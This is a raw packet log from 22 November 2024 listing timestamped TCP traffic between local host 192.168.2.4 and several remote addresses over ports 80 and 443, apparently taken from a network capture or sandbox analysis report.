Nov 22, 2024 20:35:40.082880974 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.083163023 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.083214998 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.083414078 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.083457947 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.083554983 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.083590984 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.084567070 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.084608078 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.084678888 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.084717989 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.085722923 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.085757017 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.085799932 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.085834980 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.086818933 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.086860895 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.086920977 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.086970091 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.088023901 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.088063002 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.088150024 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.088187933 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.089142084 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.089179993 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.089215994 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.089258909 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.090199947 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.090245962 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.090323925 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.090361118 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.091340065 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.091383934 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.091470003 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.091520071 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.092463017 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.092519045 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.092577934 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.092613935 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.093621969 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.093667984 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.093736887 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.093776941 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.094741106 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.094784975 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.094825983 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.094861031 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.095865965 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.095916986 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.095984936 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.096026897 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.096955061 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.097002983 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.105854988 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.105880022 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.105935097 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.106147051 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.106264114 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.106355906 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.106355906 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.107283115 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.107338905 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.107393026 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.107434988 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.108439922 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.108493090 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.108546972 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.108594894 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.109556913 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.109602928 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.109677076 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.109719038 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.110692978 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.110739946 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.110800982 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.110842943 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.111825943 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.111867905 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.111917973 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.111960888 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.112898111 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.112940073 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.232280970 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.232353926 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.232426882 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.232486010 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.232779026 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.232821941 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.232908964 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.232944012 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.233910084 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.233963013 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.234019995 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.234064102 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.235073090 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.235120058 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.235146046 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.235181093 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.236174107 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.236217976 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.236304045 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.236341953 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.237301111 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.237346888 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.237409115 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.237447977 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.238434076 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.238481998 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.238563061 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.238600016 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.239564896 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.239609957 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.239680052 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.239717960 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.240725994 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.240772009 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.240855932 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.240892887 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.241925001 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.241993904 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.242001057 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.242038012 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.242952108 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.242997885 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.243056059 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.243093014 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.244127989 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.244169950 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.244200945 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.244240999 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.245265961 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.245306015 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.245407104 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.245450974 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.246370077 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.246419907 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.246431112 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.246470928 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.247608900 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.247657061 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.247688055 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.247734070 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.248634100 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.248673916 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.248739958 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.248795033 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.249814034 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.249857903 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.249886990 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.249922991 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.250870943 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.250916004 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.251022100 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.251064062 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.252058029 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.252130032 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.252140045 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.252172947 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.253168106 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.253216028 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.253288031 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.253329039 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.254317045 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.254354954 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.254426956 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.254466057 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.255460978 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.255502939 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.255537987 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.255583048 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.256591082 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.256637096 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.256711960 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.256757021 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.257697105 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.257742882 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.257833004 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.257882118 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.258970022 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.259013891 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.259098053 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.259139061 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.259999037 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.260047913 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.260098934 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.260144949 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.261120081 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.261166096 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.261303902 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.261356115 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.262243986 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.262285948 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.262382030 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.262427092 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.263390064 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.263432980 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.263503075 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.263541937 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.264507055 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.264547110 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.264624119 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.264659882 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.265700102 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.265742064 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.265789986 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.265826941 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.266788960 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.266838074 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.266872883 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.266906977 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.267975092 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.268019915 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.268179893 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.268227100 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.269015074 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.269058943 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.275048018 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.275100946 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.275181055 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.275218964 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.275528908 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.275573015 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.275613070 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.275650024 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.276709080 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.276751041 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.276787043 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.276825905 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.277793884 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.277832985 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.277930021 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.277968884 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.278913975 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.278964996 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.279045105 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.279092073 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.280055046 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.280102968 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.280124903 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.280163050 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.281200886 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.281254053 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.281347036 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.281390905 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.282352924 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.282401085 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.282538891 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.282592058 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.283601046 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.283646107 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.283759117 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.283804893 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.284702063 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.284749985 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.284775019 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.284810066 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.285707951 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.285754919 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.285890102 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.285926104 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.286835909 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.286878109 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.286931038 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.286967039 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.288085938 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.288140059 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.288141012 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.288182020 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.289180994 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.289231062 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.298033953 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.298086882 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.298286915 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.298341990 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.298559904 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.298600912 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.298619032 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.298661947 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.482580900 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:40.602339029 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:40.670162916 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:40.670269012 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:40.670312881 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:40.670629978 CET	49760	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:40.792361021 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:40.792560101 CET	80	49760	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:40.792767048 CET	49760	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:40.792963028 CET	49760	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:40.914829969 CET	80	49760	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:42.643117905 CET	80	49760	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:42.643197060 CET	49760	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:45.690815926 CET	49760	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:45.692059994 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:54.691823959 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:54.691898108 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:54.691997051 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:54.695971012 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:54.696022987 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:56.485680103 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:56.485806942 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:56.489339113 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:56.489376068 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:56.489660025 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:56.497809887 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:56.539345980 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:56.971807957 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:56.971832037 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:56.971925974 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:56.971926928 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:56.971966028 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:56.972001076 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:56.972023010 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.080624104 CET	49762	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:57.080672026 CET	443	49762	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:57.080833912 CET	49762	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:57.081223011 CET	49762	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:57.081237078 CET	443	49762	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:57.169197083 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.169219971 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.169323921 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.169344902 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.169400930 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.218554020 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.218592882 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.218741894 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.218782902 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.218842983 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.346260071 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.346283913 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.346425056 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.346446037 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.346503973 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.383147955 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.383169889 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.383275986 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.383296967 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.383363962 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.404321909 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.404339075 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.404407978 CET	49761	443	192.168.2.4	13.107.246.63
